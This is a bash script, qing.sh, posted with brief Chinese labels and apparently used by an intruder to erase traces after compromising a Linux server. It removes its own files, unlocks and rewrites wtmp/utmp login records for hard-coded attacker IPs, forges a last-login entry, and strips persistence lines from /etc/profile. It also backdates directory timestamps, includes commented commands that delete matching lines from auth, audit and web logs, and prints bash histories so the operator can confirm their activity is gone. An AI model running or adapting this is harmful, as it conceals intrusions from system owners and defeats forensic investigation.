文件名
qing.sh
代码如下
#!/bin/bash
rm -f qing.sh*
rm -f hide_centos7*.sh*
user2=$(last -a | grep -v "root\|reboot\|system\|boot"|sed -n '1p' | awk '{print $1}')
user3=$(last -a | grep -v "root\|reboot\|$user2\|system\|boot"|sed -n '1p' | awk '{print $1}')
chattr -i /var/log/wtmp ; chattr -i /root/.bash_history ; chattr -i /home/$user2/.bash_history ; rm -f /tmp/.font-unix/so.bak ;rm -f /usr/local/sbin/jon ;
ipset4='mysql1'
ipset3='18.162.213.72'
ipset2='localhost'
ipset='43.154.131.34'
ip=$(last -a |sed -n '1p' | awk '{print $10}')
user=$(last -a |sed -n '1p' | awk '{print $1}')
tip=$(last |sed -n '1p' | awk '{print $3}')
time=$(who /var/log/wtmp | sed -n '$p' | awk '{print $3,$4}' )
sjc=$(date -d "$time" +%s)
riqi=$(date -d @$sjc "+%Y:%m:%d:%H:%M:%S")
if [[ $tip = $ipset ]]; then
nl-addr -w $user $ipset
nl-addr -f /var/log/wtmp -w $user $ipset
nl-addr -u $user $ipset
nl-addr -f /run/utmp -u $user $ipset
fi
if [[ $tip = $ipset2 ]]; then
nl-addr -w $user $ipset2
nl-addr -f /var/log/wtmp -w $user $ipset2
nl-addr -u $user $ipset2
nl-addr -f /run/utmp -u $user $ipset2
fi
if [[ $tip = $ipset3 ]]; then
nl-addr -w $user $ipset3
nl-addr -f /var/log/wtmp -w $user $ipset3
nl-addr -u $user $ipset3
nl-addr -f /run/utmp -u $user $ipset3
fi
if [[ $tip = $ipset4 ]]; then
nl-addr -w $user $ipset4
nl-addr -f /var/log/wtmp -w $user $ipset4
nl-addr -u $user $ipset4
nl-addr -f /run/utmp -u $user $ipset4
fi
tip3=$(last |sed -n '1p' | awk '{print $3}')
time2=$(who /var/log/wtmp | sed -n '$p' | awk '{print $3}' )
#sed -i '/'$time2'/d' /var/log/dpkg.log* ;
#sed -i '/'$ipset'/d' /var/log/secure* ;
#sed -i '/'$ipset'/d' /var/log/audit/audit.* ;
#sed -i '/'$ipset'/d' /www/wwwlogs/access.* ;
#sed -i '/'error:'/d' /var/log/messages ;
#sed -i '/'systemd-logind:'/d' /var/log/messages ;
#sed -i '/'$ipset'/d' /var/log/auth.log* ;
#sed -i '/'kernel-'/d' /var/log/messages* ;
#sed -i '/'ipaddr:'/d' /var/log/messages* ;
kill -9 $(/usr/lib/ps -ef | grep rpm.sh | grep -v grep | awk '{print $2}') >/dev/null 2>&1
#kill -9 $(ps -ef | grep sftp-server | grep -v grep | awk '{print $2}') >/dev/null 2>&1
cd /etc
pro="chmod +x /usr/lib/"
ls="ls | grep"
pro=${pro//\//\\\/}
sid="setsid /usr/lib/rpm/rpm"
sid=${sid//\//\\\/}
sid2="setsid /usr/lib/apt/apt"
sid2=${sid2//\//\\\/}
sed -i '/'"$ls"'/,+3d' /etc/profile >/dev/null 2>&1
sed -i '/'"${pro}"'/,+2d' /etc/profile >/dev/null 2>&1
sed -i '/'"${sid}"'/,+1d' /etc/profile >/dev/null 2>&1
sed -i '/'"${sid2}"'/,+1d' /etc/profile >/dev/null 2>&1
touch -r /etc/* /usr/lib
touch -r /etc/* /usr/
touch -r /etc/* /usr/bin
touch -r /etc/* /usr/sbin
touch -r /etc/* /bin
touch -r /etc/* /tmp/.font-unix
tip2=$(last |sed -n '1p' | awk '{print $3}')
if [[ "$tip2" = "" ]]; then
nl-addr -m $user localhost tty1 $riqi
echo nl-addr -m $user localhost tty1 $riqi
else
nl-addr -m $user $tip2 tty1 $riqi
echo nl-addr -m $user $tip2 tty1 $riqi
fi
echo
echo 这里查看/root/.bash_history操作记录中有没有自己的记录---------------------------最近5条
echo
cat /root/.bash_history |tail -n 5
echo
user2=$(last -a | grep -v "root\|reboot\|system\|boot"|sed -n '1p' | awk '{print $1}')
if [[ $user2 != "" ]]; then
echo 这里查看/root/$user2 的用户操作记录---------------------------------------------最近5条
cat /home/$user2/.bash_history |tail -n 5
fi
echo
user3=$(last -a | grep -v "root\|reboot\|$user2\|system\|boot"|sed -n '1p' | awk '{print $1}')
if [[ $user3 != "" ]]; then
echo 这里查看/root/$user3 的用户操作记录---------------------------------------------最近5条
cat /home/$user3/.bash_history |tail -n 5
fi
echo
user4=$(last -a | grep -v "root\|reboot\|$user2\|$user3\|system\|boot"|sed -n '1p' | awk '{print $1}')
if [[ $user4 != "" ]]; then
echo 这里查看/root/$user4 的用户操作记录---------------------------------------------最近5条
cat /home/$user4/.bash_history |tail -n 5
fi
user5=$(last -a | grep -v "root\|reboot\|$user2\|$user3\|$user4\|system\|boot"|sed -n '1p' | awk '{print $1}')
if [[ $user5 != "" ]]; then
echo 这里查看/root/$user5 的用户操作记录---------------------------------------------最近5条
cat /home/$user5/.bash_history |tail -n 5
fi
echo 这里是查看last的最新登录ip是不是别人的---------------------------------------显示前三条登录记录
last -a | head -n 3
echo
ps aux | grep "12:9\|7:8\|7:9" | grep -v grep
|